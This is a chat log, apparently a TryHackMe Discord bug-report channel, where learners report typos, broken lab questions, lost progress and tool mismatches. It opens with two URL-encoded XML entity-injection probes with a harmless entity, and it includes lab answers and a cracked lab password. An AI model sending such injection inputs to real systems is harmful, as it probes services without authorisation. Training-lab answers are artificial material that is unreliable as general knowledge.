xxe=%3C%21DOCTYPE+replace+%5B%3C%21ENTITY+name+%22feast%22%3E+%5D%3E%0D%0A%C2%A0%3CuserInfo%3E%0D%0A++%3CfirstName%3Efalcon%3C%2FfirstName%3E%0D%0A++%3ClastName%3E%26name%3B%3C%2FlastName%3E%0D%0A%C2%A0%3C%2FuserInfo%3E
xxe=%3C%21DOCTYPE+replace+%5B%3C%21ENTITY+name+%22feast%22%3E+%5D%3E%0D%0A+%3CuserInfo%3E%0D%0A++%3CfirstName%3Efalcon%3C%2FfirstName%3E%0D%0A++%3ClastName%3E%26name%3B%3C%2FlastName%3E%0D%0A+%3C%2FuserInfo%3E

According to https://stackoverflow.com/questions/2774471/what-is-c2-a0-in-mime-encoded-quoted-printable-text, this is UTF-8 for a non-breaking space.

chrome thorn
#

still continue that problem + in pictures I see adobe but no adobe in that server

dense garnet
#

Basically pull a β€œit works for me”.

thick cypress
#

Hi, having the same issue as @radiant orchid , just with the other question. Repeated twice, when answered, it is greened, but the day is not flagged as completed. After page refresh, the repeated question is unanswered. Tried everything I could, even other computers and phone, nothing has helped.

undone depot
#

Hey together,
i'm on windows Fundammmmentals Part 2 and the last question shoooould have the aaanswer regedit.exe - but thm says it's wrong 😦
Can't find a own room for the windows fundamentals - so soooooooooooooooorry, if i'm wrong here πŸ™‚

#

i think my magic keybard is end of life, if it does some keys so often 😦

#

regedt32.exe this is accepted but i think that's not that right πŸ˜‰

wheat wasp
#

Hi
There is small typo in the Data Exfiltration room, Task 9.
The script pings test.thm.com, but the explanation is referring to test.tunnel.com

brittle crown
#

Hi ! I found an error in a room, where should I report it ?

steel hearth
#

Hi!

I think there is a bug in AoC day 2. One of the questions appears twice, and the page forgets about the correct answer after refreshing, so I cannot finish the task.

#

this one:

Use the ls command to list the files present in the current directory. How many log files are present?

brittle crown
rotund burrow
#

@raw bison

raw bison
#

-banspam 909027263482318858

livid escarpBOT
#

πŸ”¨ Banned THANGDEEPTRY#3053 indefinitely

torn plume
#

Hello, there's an Issue with https://Tryhackme.com/room/postexploit

The problem is with Sharphound, the newest Bloodhound 4.2 requires Sharphound.exe not sharphound.ps1
The import will always fail, you will need to gather details from the compromised Windows with .\sharphound.exe

You can get sharphound.exe from the official github of BloodHoundAD

#

Please fix the issue, as i wasted alot of time trying to figure this out

placid abyss
#

@twin tapir

winged wraith
#

In https://tryhackme.com/room/walkinganapplication, task 6. I found an unused flag (||THM{HEADER_FLAG}||) inside the contact-msg request, which I confused for the one I was actually looking for. You can find it, if you click on the request in the network tab and look under Headers > Response Headers.

placid abyss
livid escarpBOT
#

Gave +1 Rep to @placid abyss

placid abyss
twin tapir
torn plume
#

Task 3 Enumeration w/ Bloodhound

knotty zinc
#

In the room "Nmap Advanced Port Scans" there is a spelling mistake in task 2 in the last paragraph just before the questions. It should be "one scenario where these three scan types can be efficient..", but the One is missing an E (currently it is "on scenario...")

wide nymph
#

Hey #room-bugs I seem to have a double question issue?

#

Can't work out how to paste / attach an image in this chat window!! but anyway, hopefully this shows the issue: https://ibb.co/Wc5VnsR

rugged canyon
#

!docs verify

tropic flameBOT
rugged canyon
#

then follow that link in the bot message

#

read what it tells you... then you verify with the bot... then you can post pictures

wide nymph
#

thanks

#

ok! so the third question is a duplicate of the second, accepts the same answer but the room doesn't get marked completed. advent of cyber, day #5

#

From the task write up, it says the author is Phillip Wylie. Do they need to fix?

steel hearth
rugged canyon
#

think the bug is more on the site side actually

steel hearth
#

It is still the same

rugged canyon
#

@glad badger can we look into this quickly????

glad badger
wide nymph
glad badger
wide nymph
glad badger
#

It looks like it is a display error. You have all three questions answered.

wide nymph
#

True unfortunately the task doesn't get marked completed though

glad badger
wide nymph
livid escarpBOT
#

Gave +1 Rep to @glad badger

glad badger
wide nymph
glad badger
spark crag
#

Re: Advent of Cyber Day 5, ||the VNC password answer field is not case sensitive -- it accepted an all-caps version of the answer FYI||

harsh mauve
#

Hi, I lost all of my progress on AoC 2022 since day 1 to day 5. Is this a bug or something? It would be a waste to re-do them all over again.....

quick patrol
#

?

worthy forum
#

+1, lost all progress as well, should we just redo it?

indigo mango
#

Hello,

Metasploit Exploitation Task 2

"What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task"

I have set up Metasploit using SMB_login module

set the fields; PASS_FILE (the wordlists), Set RHOSTS (Target IP) and SMBUser (penny)

Exploited/Run and I have a success on the password to penny is ||leo1234||

I have check this against a online walk through and seems I am correct but THM is not accepting the answer?

Update: I think the issue with the Cyber Advent had effect some other services and that was the maybe the cause on THM servers. The answer is now accepted.

prime viper
#

someone else having all progress lost on the Advent of Cyber 2022 room

green crag
#

Yeah it looks like mine and a few others have

white skiff
#

looks like the latest task in the advent of cyber 2022 room doesn't allow for SSH access to the target machine. For folks who can't use the browser-based attackbox this is a complete blocker, can this be looked into?

glad badger
white skiff
#

@glad badger not if you can't use the browser-based environment to interact with it πŸ™‚ that system isn't screen reader-accessible, so the only way left for people reliant on that kind of tech is to ssh into the machine from the attack box to have an accessible interface. Except ....that can't be done on the day 6 machine πŸ™‚ the ubuntu user doesn't appear to have ssh access

tame lion
#

Hi, in the Threat Intelligence Tools room, the Email1.eml seems to be missing

abstract wren
#

@tame lion i just launched and it is there for me

#

open the folder called email on the desktop, or cd from command to cd Desktop/Emails

tame lion
#

Ohh, I'll try again thanks

hasty jackal
#

Anyone complete https://tryhackme.com/room/postexploit recently? I'm getting an error on bloodhound section when I try to upload the ZIP produced with Invoke-Bloodhound. It says something like "BAD JSON FORMAT"

hasty jackal
wide nymph
#

Hey, any update on my phantom / ghost question on AoC Task 10 (Day 5)? Looks like it's still stuck in the same behaviour as yesterday. FYI, this hasn't impacted Day 6.

summer ibex
#

Not a big bug but took a little careful stepping in Network Services 2 room, Task 4

#

the bash executable didn't have it's execute bit set

#

... so there's more to the process than indicated when changing permissions - hope this makes sense

#

Got the flag - so pls excuse my post here, no bug, just had to think

rotund burrow
#

@gleaming shadow

#

These scammers are so lazy nowadays that they don't even put an effort in writing a proper scam message. BROOO FREE SCAM BROOO kekw

dusky junco
#

-ban 602784996226367499 -ddays 1 nitro scam/spam. Email bans@tryhackme.com once you have secured your account

livid escarpBOT
#

πŸ”¨ Banned Sofblock#7146 indefinitely

near flint
#

Nmap Live Host Discovery, Nmap Host Discovery Using ARP (https://tryhackme.com/room/nmap01)

(...)

How many devices are you able to discover using ARP requests?

I'm getting an error popped up: "Data in packet must be a valid device", but can't see what I am doing wrong. Is it me, or is it bugged? πŸ™‚

muted panther
#

AoC Day 7
Should say Panel 3 I believe
(Under CyberChef Overview)

#

This is the place for reporting typos too, right? Or is it just for actual bugs

glad badger
livid escarpBOT
#

Gave +1 Rep to @muted panther

gleaming shadow
summer ibex
near flint
summer ibex
near flint
calm bear
#

Hello, I'd like to report a bug in the room https://tryhackme.com/room/tmuxremux.
Since THM questions allow for single chars to be wrong, it is possible to get multiple answers correct with the exact same answer (See screenshot).
I doubt this is intentional.

#

This particular answer works for a total of 9 answers of the room. (Counted the format, didn't test all of them.) And there are a few other answer formats that have this problem in the same room.

summer ibex
#

Other than that, perhaps try toggling your browser extensions that may be causing a block, e.g. Privacy Badger...

dusky junco
dense hearth
#

hi

steel hearth
terse ermine
#

Agent_T Room has port 80 open but it's inaccessible

#

Should I ping the creators of the room?

raw bison
blissful flame
#

Hello, currently doing "Internal" machine and when trying to access any sub directory of the web page it doesn't load, it take ages and when it finally loads it only does half of the content and its all messed up. Is it a vpn problem or what should i do? Impossible to load the wp-login sub directory

raw bison
half solstice
#

tryhackme.com/room/wireshark task 8. It says One of the main difference that distinguishes a reply packet is the code, in this case, you can see it is 0, confirming that it is a reply packet. It should say differences and distinguish. Or take out One of.

noble needle
#

;Day 9, task 14.
/.dockerenv is a 0 byte empty file.
Where does the IP we're adding in write-up actually come from?: route add 172.17.0.1/32 -1

eternal summit
noble needle
#

Same room
"What ports are open on the host machine?"
There are more ports open than it wants given.

rugged canyon
noble needle
rugged canyon
#

did you really read the text next to said port numbers???

#

443 is marked as closed

#

same with 5432

noble needle
#

ah, you're right. I withdraw my statement πŸ˜„

rugged canyon
#

lols

wheat fractal
livid escarpBOT
#

Gave +1 Rep to @twin tapir

obtuse ingot
#

I don't know if it's 'on purpose', but on Day 10, Advent of Cyber 2022, so, today, at the very very end, after the flag, I got the name: Delf McSkidy on the screen...

Just checked the official walkthrough and it's the same, at 33:33 of the video...

So, after the Elf McSkiddy - extra d, is restored, and we get the flag, there's Delf McSkidy...

hexed violet
snow shoal
#

Basic malvare re ans is incorrect

obtuse ingot
#

Because you are missing a few characters at the end... @snow shoal

snow shoal
#

Ok

rugged void
quaint sparrow
quaint sparrow
# rugged void

Have you tried to add any of the information in the task?

rugged void
#

Yep. Only errors (UNION failing) are shown.

quaint sparrow
#

What's your target ip?

rugged void
#

10.10.180.204

quaint sparrow
#

Do you understand what the {"taken":"false:} means?

rugged void
#

OUCH

#

Forget me. I simply misinterpreted the line "Cycling through all the characters, you'll discover the password is xxxx.".
Embarrassing. Thanks.

#

Yeah, finished the room with no further probs. Thanks again. πŸ™‚

stoic vigil
#

Can't turn in flag in room Memory Forensics, Task 3: Analysis. Question 2; What did john write

stoic vigil
#

Can i Dm you real Quick

quaint sparrow
#

Yes.

wide nymph
#

Hey, been AFK for a few days. Was there any update on the AoC Day 5 / Task 10 ghost question / cannot complete issue I raised here last week? If something gets 'escalated', is there some way to get updates? Do I just wait for a notification?

wide nymph
wheat fractal
#

I believe this is the correct room for this, if not, please let me know where it should go πŸ™‚ (incoming screenshot)

#

Burp Suite: The Basics, Task 7. I believe there is an extra "few" that makes this sentence sound off:

swift crater
#

Task 4 of the pwn101 room appears to not work. I can enter the admin function but the program segfaults afterwards. Solution from the first walkthrough appears to do the same thing as well.

swift crater
#

Seems to enter the system function then just dies.

livid escarpBOT
#

Gave +1 Rep to @neat beacon

steel hearth
# wide nymph Hey <@719230703161835633> what happens once an issue gets forwarded? Will I hear...

I still have the same issue. I looked at the response that my browser gets from the API when the page loads, and the question is present twice in the JSON with different results. I think it was stored to the database twice (maybe somehow the second request was recorded by the server before it fully processed the first one, or something like this). It is not supposed to happen, so there is probably no check for this when the API response is generated.

wide nymph